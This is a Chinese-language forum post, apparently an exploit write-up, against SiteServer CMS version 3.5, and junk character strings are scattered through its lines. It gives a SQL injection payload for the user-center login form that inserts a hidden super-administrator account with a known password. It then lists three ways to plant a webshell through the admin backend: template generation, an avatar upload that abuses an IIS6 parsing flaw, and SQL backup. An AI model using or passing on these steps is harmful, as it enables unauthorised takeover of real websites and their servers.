经测试秒杀最新的3.5版" w. z- v& r6 h" C" s3 o4 q. f
stieserver官网:www.siteserver.cn9 f( s% U4 D6 ?3 m
EXP:
9 s b$ P6 O% u5 t# O; e直接访问UserCenter/login.aspx
1 ^8 E! c1 M" a/ f用户名处输入:' |4 o+ T3 B& X: N) a! c
6 x- ]. @! n m* R% d) z" y
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
/ X) e, b3 m( f3 m密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
) |, g5 v' p* T2 s% z8 J/ I之后再访问后台SiteServer/login.aspx用插入的用户登陆
# a( m1 J5 k4 K: d( i8 j后台拿webshell的三种方法:
' [* m2 d; S3 E6 d; q) }6 m4 J一、3 d2 \* B7 B1 X% a- A) V, i
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
* Q1 @$ y9 y/ o0 ~7 R二、+ k f$ _1 z, q( g
成员权限-》添加用户-》用户名为:1.asp
; k: A3 S% L) k" S/ f2 xhttp://127.0.0.1/usercenter/
9 j: V" G( V2 R7 E$ f8 h用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell5 ?6 F; R& I" A! ~
(ps:后台添加用户时不会验证是否含有非法字符)
( g* L% N s" D: O' r% J' E三、/ @& L P' {1 G* @5 G
系统工具-》实用工具-》机器参数查看
! E3 F) v) c0 i7 S/ m可以看到数据库类型、名称,WEB路径8 \1 s7 v6 a4 Y6 `2 ?0 E2 C t
系统工具-》数据库工具-》SQL语句查询. u0 I8 f* _- @* { T0 y
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |